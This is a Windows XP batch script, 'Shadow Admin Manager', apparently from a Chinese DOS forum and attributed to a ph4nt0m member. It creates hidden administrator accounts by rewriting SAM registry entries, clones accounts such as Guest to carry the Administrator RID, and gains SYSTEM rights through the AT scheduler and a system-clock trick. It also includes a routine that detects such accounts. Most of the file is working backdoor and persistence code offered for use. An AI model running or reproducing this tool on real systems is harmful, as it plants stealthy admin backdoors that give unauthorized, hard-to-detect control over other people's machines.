中国DOS联盟

::SAM.CMD - 2006-11-25 By 赤红十三 @ ph4nt0m

@ECHO OFF
IF %1:==: GOTO USAGE
SETLOCAL
SET CMDFILE=%~S0
IF /I %1==/Add SHIFT
IF /I %1==/Del SET ACTION=DEL&&SHIFT
IF /I %1==/Clone SET ACTION=CLONE %2&&SHIFT&&SHIFT
IF /I %1==/Check SET ACTION=CHECK&&SET CMDFILE=/INTERACTIVE %CMDFILE%
IF NOT %3#==# GOTO BEGIN
REM 程序依赖文件检查
FOR %%I IN (NET.EXE SC.EXE REG.EXE AT.EXE FIND.EXE MORE.COM PING.EXE) DO (
        IF "%%~$PATH:I"=="" (
                ECHO 程序所依赖的文件 "%%I" 不存在
                SET ERROR=程序无法正常运行
        )
)
IF DEFINED ERROR GOTO ERROR
2>NUL CALL:SU2SYS %1 %2 /ADD
GOTO :EOF

:BEGIN
>NUL 2>NUL REG QUERY HKLM\SAM\SAM||GOTO USAGE
SET REGKEY=HKLM\SAM\SAM\Domains\Account\Users\
IF %3==/DEL GOTO DELUSER
IF %3==/CHECK GOTO CHECK
IF %3==/CLONE GOTO CLONE
REM 如果存在UserName则先删除
CALL:DELUSER %1
REM 建立用户
NET USER %1 %2 /ADD
REM 导出相应注册表项
REG EXPORT %REGKEY%000001F4 1F4.REG
REG EXPORT %REGKEY%Names\%1 %1.REG
REM 获取新建帐户RID
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %1.REG') DO SET RID=%%F
REM 导出新建帐户Users项数据
REG EXPORT %REGKEY%00000%RID% %RID%.REG
REM 生成帐号的注册表数据
ECHO Windows Registry Editor Version 5.00>%RID%
ECHO [HKEY_LOCAL_MACHINE%REGKEY:~4%00000%RID%]>>%RID%
REM 传递1F4中F键键值
TYPE 1F4.REG>1F4
SET LINE=2
:FKEYLOOP
SET /A LINE+=1
IF %LINE%==7 GOTO ENDFKEY
FOR /F "SKIP=%LINE% DELIMS=" %%F IN (1F4) DO >>%RID% ECHO %%F&&GOTO FKEYLOOP
:ENDFKEY
REM 补充剩下的V键及Names项数据
MORE +7 %RID%.REG>>%RID%
MORE +2 %1.REG>>%RID%
REM 删除用户
NET USER %1 /DEL
REM 导入修改后的注册表文件
REG IMPORT %RID%
REM 删除过程生成的文件
DEL 1F4 1F4.REG %1.REG %RID% %RID%.REG
GOTO :EOF

:DELUSER
2>NUL REG EXPORT %REGKEY%Names\%1 %1.REG||EXIT/B
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %1.REG') DO SET RID=%%F
REG DELETE %REGKEY%Names\%1 /F
REG DELETE %REGKEY%00000%RID% /F
NET USER %1 /ADD
NET USER %1 /DEL
REM 删除用户目录
IF EXIST %SYSTEMDRIVE%\DOCUME~1\%1\NUL RD /S /Q "%SYSTEMDRIVE%\DOCUME~1\%1"
GOTO :EOF

:CHECK
::不支持检测用户名中带有空格等其他BT字符的帐号
::检测的办法是将非管理组的成员F键中的相对标志符
::与管理组的相对标志符比较
::如果相同并且该帐号是激活状态则为SA
COLOR 02
TITLE CHECK SHADOW ADMINISTRATOR
SETLOCAL ENABLEDELAYEDEXPANSION
ECHO >"Account List"
FINDSTR /V \ "Account List" /X 2>NUL
DEL "Account List"
ECHO.
ECHO  RID(0x)         Account
FOR /F "TOKENS=8 DELIMS=\" %%F IN ('REG QUERY %REGKEY%Names') DO (
        REG EXPORT %REGKEY%Names\%%F %%F.REG>NUL
        FOR /F "TOKENS=2 DELIMS=()" %%G IN ('FIND /I "@=HEX" %%F.REG') DO (
                ECHO   [%%G]                [%%F]
                NET USER %%F|FIND /I "*Administrators">NUL&&SET,=%%F\!,!&&SET ADMINS=%%F%%G !ADMINS!||SET USERS=%%F%%G !USERS!
        )
        DEL %%F.REG
)
ECHO.
ECHO  [%,:~0,-1%]>"Administrators Contains"
FINDSTR /V : "Administrators Contains" /X 2>NUL
DEL "Administrators Contains"
ECHO.
ECHO >"Check Result"
FINDSTR /V \ "Check Result" /X 2>NUL
DEL "Check Result"
ECHO.
FOR %%I IN (%ADMINS%) DO (
        FOR %%J IN (%USERS%) DO (
                SET C1=%%I&&SET C1FRID=!C1:~-2!0!C1:~-3,1!
                SET C2=%%J&&SET C2RID=!C2:~-3!
                FOR /F "TOKENS=3" %%K IN ('REG QUERY %REGKEY%00000!C2RID! /V F') DO (SET C2.F=%%K)
                IF /I "!C2.F:~96,4!"=="!C1FRID!" IF "!C2.F:~112,2!"=="10" ECHO [!C2:~0,-3!] ^<==^> [!C1:~0,-3!]
        )
)
ECHO.
SET/P=Press [Enter] to exit...&&PAUSE>NUL
GOTO :EOF

:CLONE
::克隆的帐号必须存在,而且最好是系统内置帐号
::参数调整
IF %2==/ADD (
        SET CU=1F4
        SET UN=%4
        SET PW=%1
) ELSE (
        REG EXPORT %REGKEY%Names\%4 %4.REG
        FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %4.REG') DO SET CU=%%F
        SET UN=%1
        SET PW=%2
        DEL %4.REG
)
::如果系统并不存在指定的CLONEUSER,CLONEUSER则为ADMINISTRATOR
IF %CU%#==# SET CU=1F4
::修改密码
NET USER %UN% %PW%||EXIT/B
::导出帐号的相对标志符
REG EXPORT %REGKEY%Names\%UN% %UN%.REG
FOR /F "TOKENS=2 DELIMS=()" %%F IN ('FIND /I "@=HEX" %UN%.REG') DO SET RID=%%F
::取用户的F键数据
FOR /F "TOKENS=3" %%I IN ('REG QUERY %REGKEY%00000%RID% /V F') DO (SET F_KEY=%%I)
::将修改后的数据导入
REG ADD %REGKEY%00000%RID% /F /V F /T REG_BINARY /D ^
%F_KEY:~0,96%%CU:~1%0%CU:~0,1%%F_KEY:~100,12%10%F_KEY:~114%
GOTO :EOF

:SU2SYS
SET REGKEY=HKLM\SYSTEM\CurrentControlSet\Services\Schedule
FOR /F "TOKENS=3" %%L IN ('REG QUERY %REGKEY% /V START^|FIND /I "START"') DO SET SCHESTART=%%L
SC CONFIG Schedule START= DEMAND>NUL
SC START Schedule>NUL
SET CHour=%TIME:~0,2%
SET CMinute=%TIME:~3,2%
IF %CMinute:~0,1%==0 SET CMinute=%CMinute:~1%
SET /A NMinute=%CMinute%+1
IF %NMinute%==60 SET NMinute=0
IF %NMinute%==0 SET /A CHour+=1
IF %CHour%==24 SET CHour=0
:ATSTATUS
>NUL AT %CHour%:%NMinute% %CMDFILE% %1 %2 /%ACTION% 2^>NUL
IF ERRORLEVEL 1 GOTO ATSTATUS
SET CTime=%TIME%
ECHO %CHour%:%NMinute%|TIME>NUL
>NUL PING/n 2 0X7F.1
ECHO %CTime%|TIME>NUL
REG ADD %REGKEY% /V START /T REG_DWORD /D %SCHESTART% /F>NUL
GOTO :EOF

:ERROR
ECHO %ERROR%
GOTO :EOF

:USAGE
ECHO.
ECHO   Shadow Admin Manager v1.0 For XP By ch0xd
ECHO.
ECHO     Usage:
ECHO   SAM [/Add] UserName [PassWord]
ECHO       /Del UserName
ECHO       /Clone [CloneUser] UserName PassWord
ECHO              -CloneUser default is Administrator
ECHO       /Check
ECHO.
ECHO     Example:
ECHO   SAM ch0xd$ hIs0k4
ECHO   SAM /Del ch0xd$
ECHO   SAM /Clone Guest hIs0k4
ECHO   SAM /Check
GOTO :EOF